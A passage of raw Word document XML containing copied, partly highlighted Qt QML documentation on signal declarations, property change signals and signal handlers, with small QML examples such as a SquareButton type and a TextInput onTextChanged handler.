      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> actionResult</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145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If the signal has no parameters, the "()" brackets are optional</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. If parameters are used, the parameter types must be declared, as for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string</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arguments for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actionPerformed</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal above. The allowed parameter types are the same as those listed under</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2772" w:anchor="defining-property-attributes" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining Property Attributes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on this page.</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145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To emit a signal, invoke it as a method</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Any relevant</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2773" w:anchor="signal-handler-attributes" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>signal handlers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will be invoked when the signal is emitted, and handlers can use the defined signal argument names to access the respective arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2526" w:name="property-change-signals"/>
      <w:bookmarkStart w:id="2527" w:name="_Toc483001081"/>
      <w:bookmarkStart w:id="2528" w:name="_Toc483604416"/>
      <w:bookmarkStart w:id="2529" w:name="_Toc483605636"/>
      <w:bookmarkEnd w:id="2526"/>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Property Change Signals</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2527"/>
      <w:bookmarkEnd w:id="2528"/>
      <w:bookmarkEnd w:id="2529"/>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QML types also provide built-in</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property change signals</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that are emitted whenever a property value changes, as previously described in the section on</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2774" w:anchor="property-attributes" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>property attributes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See the upcoming section on</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2775" w:anchor="property-change-signal-handlers" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>property change signal handlers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information about why these signals are useful, and how to use them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2530" w:name="signal-handler-attributes"/>
      <w:bookmarkStart w:id="2531" w:name="_Toc483001082"/>
      <w:bookmarkStart w:id="2532" w:name="_Toc483004054"/>
      <w:bookmarkStart w:id="2533" w:name="_Toc483604417"/>
      <w:bookmarkStart w:id="2534" w:name="_Toc483605637"/>
      <w:bookmarkEnd w:id="2530"/>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Signal Handler Attributes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2531"/>
      <w:bookmarkEnd w:id="2532"/>
      <w:bookmarkEnd w:id="2533"/>
      <w:bookmarkEnd w:id="2534"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Signal handlers are a </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>special sort of</w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2776" w:anchor="method-attributes" w:history="1">
        <w:r w:rsidRPr="00145988">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>method attribute</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, where the </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>method implementation is invoked by the QML engine whenever the associated signal is emitted</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Adding a signal to an object definition in QML will automatically add an associated signal handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the object definition, which has, by default, an empty implementation. Clients can provide an implementation, to implement program logic.</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Consider the following</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SquareButton</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type, whose definition is provided in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SquareButton.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file as shown below, with signals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activated</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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deactivated</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</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10CB8">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// SquareButton.qml</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10CB8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">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id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root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signal activated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real xPosition</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real yPosition</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signal deactivated</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property</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> side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side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side</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MouseArea</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anchors</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fill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parent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onPressed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root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activated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mouse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x</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mouse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y</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onReleased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root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deactivated</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These signals could be received by any</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SquareButton</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects in another QML file in the same directory, where implementations for the signal handlers are provided by the client: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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// myapplication.qml</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SquareButton</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onActivated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console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log</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Activated at "</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xPosition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yPosition</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onDeactivated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console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log</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Deactivated!"</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See the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2777" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Signal and Handler Event System</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more details on use of signals.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2535" w:name="_Toc483001083"/>
      <w:bookmarkStart w:id="2536" w:name="_Toc483604418"/>
      <w:bookmarkStart w:id="2537" w:name="_Toc483605638"/>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Property Change Signal Handlers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2535"/>
      <w:bookmarkEnd w:id="2536"/>
      <w:bookmarkEnd w:id="2537"/>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Signal handlers for property change signal take the syntax form</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on&lt;Property&gt;Changed</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;Property&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is the name of the property, with the first letter capitalized. For example, although the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2778" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TextInput</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type documentation does not document a</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textChanged</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal, this signal is implicitly available through the fact that</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2779" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TextInput</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">has </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2780" w:anchor="text-prop" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property and so it is possible to write an</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onTextChanged</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal handler to be called whenever this property changes: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TextInput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"Change this!"</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onTextChanged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console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log</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
